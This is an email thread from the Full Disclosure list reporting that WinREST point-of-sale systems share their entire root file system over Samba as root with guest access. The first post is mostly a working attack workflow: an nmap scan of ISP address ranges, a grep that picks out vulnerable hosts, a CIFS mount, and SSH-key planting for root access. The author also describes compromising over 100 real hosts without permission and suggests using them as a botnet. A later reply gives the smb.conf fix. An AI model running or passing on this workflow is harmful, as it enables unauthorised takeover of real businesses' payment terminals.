Re: Point of Sale WinREST machines remote privilege escalation

[Vítor Hugo Silva <up201402657 () fc up pt>]

As requested the solution is trivial.
Edit samba configuration file and remove Root file share. It is 
pointless and not recommended at all.
---
 Vítor Silva
up201402657 () fc up pt
Estudante

FACULDADE DE CIÊNCIAS DA UNIVERSIDADE DO PORTO
Rua do Campo Alegre, s/n, 4169-007 Porto, Portugal
www.fc.up.pt

A 2016-02-12 22:51, John Martinelli escreveu:

> Please shade this with FD. :)
>
> On Feb 12, 2016 5:48 PM, "Vítor Hugo Silva" <up201402657 () fc up pt> 
> wrote:
> The solution is edit this file:
> 0 /etc/samba # cat smb.conf | grep -A11 Root
> [Root]
> comment = GrupoPIE distro root dir
> path = /
> force user = root #why omg
> force group = root #just why
> guest ok = yes #this
> guest only = yes #and this too
> writable = yes #and this
> readonly = no #we love redundancy
> public = yes #Here too but it is the same as guest ok
> browsable = yes #shouldn't be
>
> 0 /etc/samba #
> But seriously why is root file system shared?
> It shouldn't even be in the samba conf file (/etc/samba/smb.conf)
> guest ok=yes will make no prompt for password.
> so the force user and group assigned to root will make guest connection 
> as root.
>
> ---
> Vítor Silva
> up201402657 () fc up pt
> Estudante | Student
>
> FACULDADE DE CIÊNCIAS DA UNIVERSIDADE DO PORTO
> Rua do Campo Alegre, s/n, 4169-007 Porto, Portugal
> www.fc.up.pt
>
> A 2016-02-12 21:55, John Martinelli escreveu:
>
> Impressive, but please provide a solution to protect these devices.
>
> On Feb 12, 2016 4:49 PM, "Vitor Silva" <up201402657 () fc up pt> wrote:
>
> So a year back I was massively scanning internet. This case ISPs IPs 
> blocks where you can find easily at RIPE for example.
> Then I found some interesting hosts where SMB were open and the ACL is 
> totally open to root file system with the same netbios name.
> All file system is writable.
>
> I was able to find some software of WinREST 
> https://www.grupopie.com/frontoffice.html so I was amazed how a system 
> like this is totaly open.
> So what I thought to do: Get root! how?
> First mount smb file share then created RSA key. I created a directory 
> under root folder of authorised keys, edited the file of dropbear to 
> make sure ssh daemon will run and done.
> Got root.
> How big this is?
> Well lets ask PIE group the company that makes this software...
> I made some shell scripts to automatically find vulnerable hosts and 
> inject all files necessarily.
> First gather all subnets of ISPs then
> # nmap -sV --open -p139 -n -oN allopenhosts -iL ISPRIPENCCblocks
>
> Since we know WinREST is vulnerable by default we filter by hostname 
> with
> # grep 'WINREST\|PINGWIN' allopenhosts -B3 | grep -Eo 
> '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
>
> Now we got a file with all hosts running winrest.
> Now run a script to read each line, mount with CIFS, and lets fun 
> begin.
> You know own some hosts. Let me show you all.
> After you find some hosts
>
> # mount -t cifs -o user=nobody,password=nobody //IP OMITTED/Root 
> /mnt/hack/
> Then just ls:
>
> # ls /mnt/hack/
> bin  boot  dev  etc  home  images.scr  lib  lost+found  mnt  Photo  
> proc  root  sbin  sys  tmp  usr  var
>
> Lets just touch something:
> /mnt/hack# touch omg ; ls
> bin  boot  dev  etc  home  images.scr  lib  lost+found  mnt  omg  Photo 
>  proc  root  sbin  sys  tmp  usr  var
>
> Omg. We can create files. Lets see root folder:
> root@hostname:/mnt/hack# cd root/
> root@hostname:/mnt/hack/root# ls
> sq_bin  sq_machines  sq_modules  sq_usr
> root@hostname:/mnt/hack/root# touch OMG
> root@hostname:/mnt/hack/root# ls
> OMG  sq_bin  sq_machines  sq_modules  sq_usr
>
> As I said now we own this. Easy generate RSA key with ssh-keygen and 
> use it to authenticate as root.
>
> root@hostname:~# ssh IP OMITTED
> 0 ~ # ls
> OMG          sq_bin*      sq_machines* sq_modules*  sq_usr*
> 0 ~ # uname -a
> Linux ws1t1 2.6.39.4-pie #15 SMP Wed Apr 30 12:39:28 WEST 2014 i686 
> GNU/Linux
> 0 ~ # cat /proc/cpuinfo
> processor       : 0
> vendor_id       : CentaurHauls
> cpu family      : 6
> model           : 13
> model name      : VIA C7 Processor 1500MHz
> stepping        : 0
> cpu MHz         : 798.000
> cache size      : 128 KB
> fdiv_bug        : no
> hlt_bug         : no
> f00f_bug        : no
> coma_bug        : no
> fpu             : yes
> fpu_exception   : yes
> cpuid level     : 1
> wp              : yes
> flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge 
> cmov pat clflush acpi mmx fxsr sse sse2 tm nx up pni est tm2 xtpr rng 
> rng_en ace ace_en ace2 ace2_en phe phe_en pmm pmm_en
> bogomips        : 1596.00
> clflush size    : 64
> cache_alignment : 64
> address sizes   : 36 bits physical, 32 bits virtual
> power management:
>
> Interesting part is you can build a botnet with this. It supports SSE 
> SSE2 so probably you could code your own C code and run it like a 
> daemon and you own a botnet.
> For what? I don't care.
> Bitcoin mining maybe, DDoS whatever.
>
> 1 Year back I made this so automatically I gathered over 100 hosts.
>
> My first security report to a seclist I hope I got some feedback.
>
> --Vítor Silva
> up201402657 () fc up pt
> Estudante | Student
>
> FACULDADE DE CIÊNCIAS DA UNIVERSIDADE DO PORTO
> Rua do Campo Alegre, s/n, 4169-007 Porto, Portugal
> www.fc.up.pt <http://www.fc.up.pt/>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/